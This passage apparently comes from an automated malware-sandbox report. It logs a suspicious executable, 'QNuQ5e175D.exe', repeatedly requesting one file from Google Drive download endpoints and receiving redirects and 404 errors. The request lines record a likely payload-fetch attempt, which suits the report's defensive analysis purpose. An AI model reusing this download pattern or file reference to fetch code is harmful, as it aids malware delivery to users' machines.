                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                      15          192.168.2.11  49984        142.250.184.225  443               7988  C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp                Bytes transferred  Direction  Data
                                                      2025-01-11 04:06:18 UTC  466                OUT        GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:18 UTC  1851               IN         HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgTQHPwfdBnfp-ztXYWzOxnM-hVeXmULAkfoaZfLc1V0Q-ePf4sh-8C4f5fe4qtqryI7tZl_S_8
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:18 GMT
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-Mu3T3IN1Ve0YN77zcErTHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:18 UTC  1652               IN
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="kiBR7ly6tNR958aq-beUSA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                      16          192.168.2.11  49990        172.217.16.142   443               7988  C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp                Bytes transferred  Direction  Data
                                                      2025-01-11 04:06:19 UTC  424                OUT        GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:19 UTC  1920               IN         HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:19 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: script-src 'nonce-SM5jJZkLMT-lW_Qj5GpJFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                      17          192.168.2.11  49996        142.250.184.225  443               7988  C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp                Bytes transferred  Direction  Data
                                                      2025-01-11 04:06:20 UTC  466                OUT        GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:20 UTC  1851               IN         HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgRPc2edr0MeDBTSTsYrturhPAcPn9kUJhIQjYTunpBjZ-66fhx8cClLbHVS7oV4oA_XeQyqBuY
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:20 GMT
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-5UbIlpXEUUaJdiC3T6yoyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:20 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="YV765OWwHj0W-dI-md7xuQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      18 | 192.168.2.11 | 49997 | 172.217.16.142 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:21 UTC | 424 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:22 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:21 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-Do7OH4UsDVXExjrIIGxbZg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      19 | 192.168.2.11 | 49998 | 142.250.184.225 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:22 UTC | 466 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:23 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgTe8q5Xf09XMaNgsioVGNXw6ve2IKa3hpDmCVd6qYG9X3zlvKTbU4PKMfkK1C3mH87u
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:23 GMT
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy: script-src 'nonce-yVMzFqr-45LlEoaaWKUESw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:23 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9zzYRp9RmovCUoz10z6HcQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      20 | 192.168.2.11 | 49999 | 172.217.16.142 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:23 UTC | 424 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:24 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:24 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: script-src 'nonce-QsrgfbcAQ--n0aKOkQ8DbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      21 | 192.168.2.11 | 50000 | 142.250.184.225 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:24 UTC | 466 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:25 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFiumC5UDBcF1tDJrVDDsMZggfVo91g2qIDiD5VLUqYOhse8fUefxqhSlzT4mn0K5YkM_GDo
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:25 GMT
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-4JfukRkcZnKtvJf2QnTFbQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:25 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="k27LTTUUeefgG61lQ0pfPg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      22 | 192.168.2.11 | 50001 | 172.217.16.142 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:26 UTC | 424 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:26 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:26 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: script-src 'nonce-hBPTF6RUDwAnp3f5OeLibw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      23 | 192.168.2.11 | 50003 | 142.250.184.225 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:27 UTC | 466 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:27 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgRdeUt8bdUq_4HxK-5PIFY0_M21CY6Ou0z4QK_BLnki3WbVCApnzLyop-9h3XYdbTsi2U7LIZ0
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:27 GMT
                                                      Cross-Origin-Opener-Policy: same-origin
